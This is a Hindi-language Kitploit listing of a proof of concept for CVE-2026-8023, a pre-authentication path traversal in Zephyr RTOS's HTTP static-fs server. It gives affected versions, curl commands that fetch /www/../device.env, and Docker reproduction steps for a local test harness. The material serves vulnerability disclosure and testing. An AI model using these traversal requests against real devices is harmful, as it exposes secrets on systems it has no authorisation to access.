Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-8023 — CVE-2026-8023 के लिए PoC: प्रतिबंधित निर्देशिका में पथनाम की अनुचित सीमा ('पाथ ट्रैवर्सल') | Kitploit
उपकरण/GitHubGitHub/ret2c/cve-2026-8023
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षा
GitHubret2c/cve-2026-8023

CVE-2026-8023

CVE-2026-8023 के लिए PoC: प्रतिबंधित निर्देशिका में पथनाम की अनुचित सीमा ('पाथ ट्रैवर्सल')

रिपॉजिटरी देखें
83 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2026-8023 — Zephyr HTTP static-fs पथ पारगमन (PoC)

प्री-ऑथ पथ पारगमन Zephyr के HTTP सर्वर static-fs हैंडलर में (subsys/net/lib/http) जब वाइल्डकार्ड संसाधन मिलान (CONFIG_HTTP_SERVER_RESOURCE_WILDCARD=y) के साथ प्रयोग किया जाता है HTTP_RESOURCE_TYPE_STATIC_FS. HTTP/1.1 और HTTP/2 दोनों को प्रभावित करता है।

GHSA: GHSA-hch3-53g6-jj3h

  • प्रभावित संस्करण: >= 4.0.0, < 4.3.1; >= 4.4.0, < 4.4.2
  • इसके विरुद्ध पुष्टि: b93e61d02d5cd08d2fc559feb0253f9de3491777 (v4.4.0-rc1-32-gb93e61d02d5)
  • परिचय: कमिट e55278a87be4e5534ba772b23e459882866bcd6d (2024-07-31)
  • फिक्स कमिट: zephyrproject-rtos/zephyr#108531
curl --http1.1 --path-as-is -i "http://$URL/www/../device.env"
curl --http2-prior-knowledge --path-as-is -i "http://$URL/www/../device.env"

पुनरुत्पादन

git clone https://github.com/zephyrproject-rtos/zephyr.git
cd zephyr && git checkout b93e61d02d5cd08d2fc559feb0253f9de3491777 && cd ..
west init -l zephyr
west update

# Copy the contents of this repo's pocs/ into zephyr/pocs/
docker build -f zephyr/pocs/Dockerfile.native-sim -t zephyr-httpfs-zdi .
docker run --rm -it -v "$PWD":/work -w /work zephyr-httpfs-zdi bash

# Inside container:
west build -p always -b native_sim/native/64 \
    zephyr/pocs/http_static_fs_native_sim \
    -- -DEXTRA_DTC_OVERLAY_FILE=ramdisk.overlay
./build/zephyr/zephyr.exe

हार्नेस एक LittleFS इमेज माउंट करता है, /littlefs/device.env पर एक गुप्त लिखता है जो /littlefs/www/ वेब रूट के बाहर है, एक वाइल्डकार्ड static-fs रूट को एक्सपोज़ करता है, फिर चार लूपबैक अनुरोध जारी करता है:

जांचअनुरोधअपेक्षित
HTTP1_GLOB_TRAVERSALGET /www/../device.env (HTTP/1.1)200 + गुप्त
HTTP1_ENCODED_TRAVERSALGET /www/%2e%2e/device.env (HTTP/1.1)404 (कोई डिकोड नहीं)
HTTP2_GLOB_TRAVERSAL:path = /www/../device.env (HTTP/2)गुप्त बाइट्स
HTTP2_ENCODED_TRAVERSAL:path = /www/%2e%2e/device.env (HTTP/2)कोई गुप्त नहीं
टूल डाउनलोड करें